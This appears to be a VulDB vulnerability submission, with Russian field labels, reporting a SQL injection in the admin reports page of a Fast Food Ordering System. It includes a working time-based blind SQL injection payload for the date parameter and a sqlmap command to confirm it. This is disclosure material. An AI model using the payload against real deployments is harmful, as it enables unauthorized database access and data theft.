| Название | ffos SQL injection vulnerability exists |
|---|
| Описание | ffos/admin/reports/index.php Line 64 of the invokes the SQL query built from the untrusted data source input. This call allows an attacker to modify the meaning of a statement or execute arbitrary SQL commands
payload:page=reports&date=2022-08-27' AND (SELECT 4661 FROM (SELECT(SLEEP(5)))zoQf) AND 'VZWY'='VZWY
Use sqlmap to verify
python .\sqlmap.py -u "http://localhost/ffos/admin/?page=reports&date=2022-08-27" --current-db --batch
|
|---|
| Источник | ⚠️ https://github.com/0x14dli/ffos-SQL-injection-vulnerability-exists |
|---|
| Пользователь | 0x14d (UID 31582) |
|---|
| Представление | 27.08.2022 06:02 (4 лет назад) |
|---|
| Модерация | 27.08.2022 10:38 (5 hours later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 207422 [oretnom23 Fast Food Ordering System index.php Дата SQL-инъекция] |
|---|
| Баллы | 20 |
|---|